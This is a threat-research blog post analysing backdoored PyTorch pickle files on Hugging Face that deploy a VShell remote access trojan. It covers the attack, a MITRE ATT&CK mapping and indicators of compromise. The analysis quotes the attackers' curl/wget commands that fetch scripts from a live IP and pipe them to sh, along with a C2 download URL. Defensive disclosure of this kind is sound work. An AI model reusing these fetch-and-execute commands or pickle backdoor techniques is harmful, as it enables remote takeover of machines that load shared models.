Executive summary
Recent threat research highlights a growing risk in the Python and machine learning (ML) ecosystem: the exploitation of serialized model files, specifically those using Python’s pickle module. While commonly used for saving and loading ML models, pickle files can execute arbitrary code upon deserialization — a feature increasingly abused by threat actors.
Our investigation uncovered malicious PyTorch model files uploaded to trusted platforms like Hugging Face. These weaponized .pth files contain embedded backdoors that, when loaded, execute system-level commands to download and run remote access trojans (RATs). In one case, the payload was a Go-based ELF binary reaching out to a command-and-control server hidden behind Cloudflare Tunnel — a technique designed to evade attribution and traditional network defenses.
This attack vector underscores the need for stronger validation of third-party ML models, tighter controls on deserialization behavior, and heightened awareness of the risks tied to open-source dependencies in AI and data science workflows.
Key findings
Malicious .pth PyTorch model files were uploaded to Hugging Face under a suspicious user account.
Upon deserialization via torch.load(), the pickle files executed embedded shell commands to download and run ELF binaries.
Payloads contacted a VShell C2 endpoint using Cloudflare Tunnel to evade attribution and network defenses.
The technique exploits trusted AI platforms and relies on pickle’s capability to execute arbitrary code, a known yet often overlooked risk.
What did we discover?
In the realm of Python development, the pickle module has long been a go-to for serializing and deserializing complex objects. Its convenience, however, belies a lurking danger: the potential for malicious code execution during the unpickling process.
In Python, the pickle module is like a storage jar for your code — it lets you save complex objects, like lists, models, or custom classes, and bring them back later just as they were. This process is called pickling (saving) and unpickling (loading). It's useful when you want to preserve the state of a program, but there's a catch: unpickling can run code hidden in the file, which makes it dangerous to use with data from untrusted sources.
This vulnerability is not just theoretical; real-world instances have demonstrated the risk. For example, researchers have identified malicious pickle files that, when unpickled, deploy payloads using tools like Cobalt Strike and Metasploit. These files often masquerade as legitimate ML models, exploiting the trust users place in shared model repositories.
In our recent threat research around the abuse and hunt for malicious pickle files, Rapid7 Labs identified an attack vector where malicious actors weaponize Python pickle-based model files (.pth) to deploy remote access trojans (RATs). This technique abuses trusted machine learning repositories — in this case, Hugging Face — as distribution channels for malware. Secondarily, using the side-loading of pickle files into a Python ML library load is a novel way of abusing Living Off the Land tools present on an operating system.
Analysis
Our analysis centers on a suspicious user account that uploaded backdoored PyTorch model files to Hugging Face. These .pth files carried embedded malicious payloads that, when deserialized, executed system commands to download and run shell scripts or ELF binaries.
The attacker uploaded multiple .pth files to their Hugging Face repository:
8TX8.pth
kcp.pth
ws.pth
wsc.pth
As we can see in the screenshot below, Hugging Face is already giving a warning about the reputation of the files.

Analysis of the files:
kpc.pth contains the following command:
"curl -fsSL -m180 194.34.254.219:10410/slk || wget -T180 -q 194.34.254.219:10410/slk)|sh"
When executed, it tries to silently download a remote file (/slk) using curl. If that fails, it falls back to wget. After downloading, it pipes the result directly into sh, executing the script without writing it to disk.
The “ws.pth” contains a similar command, but slightly different remote file name:
"curl -fsSL -m180 194.34.254.219:10410/slw || wget -T180 -q 194.34.254.219:10410/slw)|sh"
The downloaded content from slk/slw contains almost the same code discovered in the wsc.pth file.
The biggest difference between the slk/slw files and the content of the wsc.pth file is that the slk/slw files are downloading from the same C2,
“hxxp://194.34.254.219:10404/?h=194.34.254.219&p=10404&t=kcp&a=l64&stage=false&encode=false”
where in the wsc.pth file, the main backdoor file is downloaded from the same Hugging Face repo.
Restructuring the code, this is the content:

In short, once it retrieves the architecture of the system, it will download a file called “ws_linux_amd64” from the Hugging Face account that also stored the other pickle files in the same library. Once retrieved it gets the execution rights assigned by the script and will run the just downloaded file “WS_Linux_AMD64”.
The Beacon file: WS_Linux_AMD64
File:ELF 64-bit
MD5: 8B58B07E167AA2BB975A3FCE8F6B1B21
SHA1: 24D0D7FF7FA7EE8723F2CB49220170608AA8C579
SHA256: 0AA6F668E4A231D2B450F27EDC0037513E9F1CBB308E923F79C393E9890D8A73
When analyzing the downloaded file, it is an ELF binary that is written in the Go language. While running the file, it attempts to reach the C2 server, at the time hosted at:
hxxp://molecular-mazda-forests-shop.trycloudflare[.]com
The attacker uses Cloudflare Tunnel to avoid attribution and bypass network controls, a tactic that is increasingly popular among attackers.
The C2 endpoint was hosting the VShell C2 page:

Analyzing the malware configuration, the configuration shows that this ELF sample — or, as we would classify it, a beacon — was built with vshell. Part of the config code:
"Vkey":"vshell","proxy":"","salt":"vshelladfg","l":false,"e":false
VShell is a cross-platform command-and-control (C2) framework originally designed for red team operations but increasingly adopted by malicious actors. Written in Go, it supports Windows, Linux, and macOS, offering capabilities such as remote command execution, file transfer, and in-memory (fileless) operation via encrypted WebSocket communication — making it stealthy and harder to detect. It has been observed being used in real-world attacks, including campaigns by suspected Chinese state-sponsored groups like UNC5174. The developer has removed the project’s source code from GitHub; however, cloned and modified versions continue to circulate.
Conclusion
The abuse of pickle deserialization in open-source AI models represents a potent blend of software supply chain compromise and evasive C2 tactics. As AI becomes more embedded in production environments, defenders must treat model files with the same scrutiny as executable code.
MITRE ATT&CK mapping
Tactic | Technique ID | Technique Name |
Execution | T1059.004 | Command and Scripting Interpreter: Unix Shell |
Execution | T1203 | Exploitation for Client Execution |
Defense Evasion | T1218 | Signed Binary Proxy Execution (torch.load) |
Command & Control | T1071.001 | Application Layer Protocol: Web Protocols |
Command & Control | T1090.001 | Proxy: Internal Proxy (Cloudflare Tunnel) |
Defense Evasion | T1027 | Obfuscated Files or Information |
Discovery / Execution | T1105 | Ingress Tool Transfer (remote scripts and binaries) |
Indicators of compromise
A full list of the indicators we researched in this blog can be found below.
Files:
Filename: ws.pth
Filesize: 495 bytes (495 B)
MD5: 5925ee590d5a03efdcbc38c6e6078fae
SHA1: 4cc45d1ae409b58794e84d06161ef8d779e62de2
SHA256: 6cb644fb1e1739b6907a86bddff7452bd965a08f21c3b70f13410e22d11b219b
Filename: wsc.pth
Filesize:1583 bytes (1.5 KB)
MD5: c26a2e09028b17eac33cf5e070c6b9f2
SHA1: 6927b8ebe37da19e3996f0c5dc657c95fbf00b0a
SHA256: 06b4c8c7032dc5619f18e6f0ebeae71ce06ea96b10214ca9b693cfb589c4bb6d
Filename: kcp.pth
Filesize: 495 bytes (495 B)
MD5: b7ceab9e2b77db38b0966911c418f589
SHA1: 7276a9a5fe41ead88a328cb952c790e3b7d3414f
SHA256: d0055d902fcb3a34e33a2d44a0b10f83d12b76fe5616c102613a36b44311d1b8
Filename: ws_linux_amd64
Filesize: 2945204 bytes (2.8 MB)
MD5: 8b58b07e167aa2bb975a3fce8f6b1b21
SHA1: 24d0d7ff7fa7ee8723f2cb49220170608aa8c579
SHA256: 0aa6f668e4a231d2b450f27edc0037513e9f1cbb308e923f79c393e9890d8a73
Network:
hxxp://molecular-mazda-forests-shop.trycloudflare[.]com
194.34.254.219:10410
194.34.254.219:10404